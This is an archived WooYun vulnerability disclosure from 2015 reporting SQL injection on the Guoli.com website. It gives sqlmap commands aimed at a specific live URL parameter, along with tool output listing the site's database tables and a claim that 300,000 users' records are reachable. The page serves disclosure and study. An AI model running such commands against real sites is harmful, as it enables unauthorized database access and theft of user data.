果粒网主站某处SQL注入 | wooyun-2015-0126798| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126798

漏洞标题：果粒网主站某处SQL注入

漏洞作者： Jinone

提交时间：2015-07-15 14:29

修复时间：2015-08-29 14:30

公开时间：2015-08-29 14:30

漏洞类型：网络设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-15：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-08-29：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

123

详细说明：

果粒网某处SQL注入，可获30万用户信息+百万级数据
Sqlmap -u "http://www.guoli.com/cy/index.php?&subject=00&longterm=2" --dbs

Sqlmap -u "http://www.guoli.com/cy/index.php?&subject=00&longterm=2" --count

好多哦

太多了不跑了

[19:56:35] [INFO] retrieved: dede_addonarticle
[19:56:57] [INFO] retrieved: dede_addonflash
[19:57:06] [INFO] retrieved: dede_addonimages
[19:57:25] [INFO] retrieved: dede_addonspec
[19:57:33] [INFO] retrieved: dede_admin
[19:57:40] [INFO] retrieved: dede_admintype
[19:57:48] [INFO] retrieved: dede_ads_cmd_cate
[19:58:04] [INFO] retrieved: dede_ads_cmd_topi
[19:58:14] [INFO] retrieved: dede_arcatt
[19:58:22] [INFO] retrieved: dede_arccache
[19:58:31] [INFO] retrieved: dede_arccache_ful
[19:58:43] [INFO] retrieved: dede_archives
[19:58:52] [INFO] retrieved: dede_archivesspec
[19:59:01] [INFO] retrieved: dede_arcrank
[19:59:10] [INFO] retrieved: dede_arctype
[19:59:21] [INFO] retrieved: dede_area
[19:59:29] [INFO] retrieved: dede_cache_feedba
[19:59:57] [INFO] retrieved: dede_channeltype
[20:00:13] [INFO] retrieved: dede_cityip
[20:00:21] [INFO] retrieved: dede_clickuser
[20:00:33] [INFO] retrieved: dede_co_dataswitc
[20:00:50] [INFO] retrieved: dede_co_exrule
[20:01:01] [INFO] retrieved: dede_co_listenurl
[20:01:17] [INFO] retrieved: dede_co_mediaurl
[20:01:30] [INFO] retrieved: dede_conote
[20:01:38] [INFO] retrieved: dede_courl
[20:01:44] [INFO] retrieved: dede_error
[20:01:52] [INFO] retrieved: dede_feedback
[20:02:04] [INFO] retrieved: dede_flin
[20:02:45] [CRITICAL] connection timed out to
 going to retry the request
k
[20:02:48] [INFO] retrieved: dede_flinktype
[20:02:56] [INFO] retrieved: dede_freelist
[20:03:07] [INFO] retrieved: dede_full_search
[20:03:23] [INFO] retrieved: dede_homepageset
[20:03:38] [INFO] retrieved: dede_keywords
[20:03:52] [INFO] retrieved: dede_log
[20:03:57] [INFO] retrieved: dede_myad
[20:04:04] [INFO] retrieved: dede_mynews
[20:04:12] [INFO] retrieved: dede_mytag
[20:04:18] [INFO] retrieved: dede_plus
[20:04:25] [INFO] retrieved: dede_search_cache
[20:05:11] [INFO] retrieved: dede_search_keywo
[20:05:24] [INFO] retrieved: dede_search_rule
[20:05:33] [INFO] retrieved: dede_sectors
[20:05:42] [INFO] retrieved: dede_sgpage
[20:05:51] [INFO] retrieved: dede_smalltypes
[20:06:07] [INFO] retrieved: dede_sysconfig
[20:06:19] [INFO] retrieved: dede_tag_index
[20:06:33] [INFO] retrieved: dede_tag_list
[20:06:41] [INFO] retrieved: dede_task
[20:06:46] [INFO] retrieved: dede_uploads
[20:06:57] [INFO] retrieved: dede_vote
[20:07:04] [INFO] fetching number of tables fo
[20:07:04] [INFO] retrieved: 107
[20:07:07] [INFO] retrieved: cdb_access
[20:07:20] [INFO] retrieved: cdb_activities
[20:07:32] [INFO] retrieved: cdb_activityappli
[20:07:50] [INFO] retrieved: cdb_add
[20:08:34] [CRITICAL] connection timed out to
 going to retry the request
ons
[20:08:39] [INFO] retrieved: cdb_adminactions
[20:08:54] [INFO] retrieved: cdb_admincu
[20:09:29] [CRITICAL] connection timed out to
 going to retry the request
stom
[20:09:35] [INFO] retrieved: cdb_admingroups
[20:09:52] [INFO] retrieved: cdb_adminnotes
[20:10:02] [INFO] retrieved: cdb_adminsessions
[20:10:15] [INFO] retrieved: cdb_advertise
[20:10:56] [CRITICAL] connection timed out to
 going to retry the request
ments
[20:11:04] [INFO] retrieved: cdb_announcements
[20:11:22] [INFO] retrieved: cdb_attachmentfie
[20:11:45] [INFO] retrieved: cdb_attachments
[20:11:50] [INFO] retrieved: cdb_attachpayment
[20:12:08] [INFO] retrieved: cdb_attachtypes
[20:12:18] [INFO] retrieved: cdb_banned
[20:12:28] [INFO] retrieved: cdb_bbcodes
[20:12:38] [INFO] retrieved: cdb_caches
[20:12:47] [INFO] retrieved: cdb_category
[20:12:58] [INFO] retrieved: cdb_creditslog
[20:13:14] [INFO] retrieved: cdb_crons
[20:13:20] [INFO] retrieved: cdb_debateposts
[20:13:36] [INFO] retrieved: cdb_debates
[20:13:41] [INFO] retrieved: cdb_failedlogins
[20:13:58] [INFO] retrieved: cdb_faqs
[20:14:03] [INFO] retrieved: cdb_favoriteforum
[20:14:20] [INFO] retrieved: cdb_favorites
[20:14:25] [INFO] retrieved: cdb_favoritethrea
[20:14:38] [INFO] retrieved: cdb_feeds
[20:14:46] [INFO] retrieved: cdb_forumfields
[20:15:00] [INFO] retrieved: cdb_forumlinks
[20:15:09] [INFO] retrieved: cdb_forumrecommen
[20:15:23] [INFO] retrieved: cdb_forums
[20:15:27] [INFO] retrieved: cdb_imagetypes
[20:15:47] [INFO] retrieved: cdb_invites
[20:16:01] [INFO] retrieved: cdb_itempool
[20:16:12] [INFO] retrieved: cdb_magiclog
[20:16:24] [INFO] retrieved: cdb_magicmarket
[20:16:34] [INFO] retrieved: cdb_magics
[20:16:39] [INFO] retrieved: cdb_medallog
[20:16:50] [INFO] retrieved: cdb_medals

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126798

漏洞标题：果粒网主站某处SQL注入

相关厂商：果粒网

漏洞作者： Jinone

提交时间：2015-07-15 14:29

修复时间：2015-08-29 14:30

公开时间：2015-08-29 14:30

漏洞类型：网络设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Jinone@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126798

漏洞标题：果粒网主站某处SQL注入

相关厂商：果粒网

漏洞作者： Jinone

提交时间：2015-07-15 14:29

修复时间：2015-08-29 14:30

公开时间：2015-08-29 14:30

漏洞类型：网络设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0126798"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Jinone@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：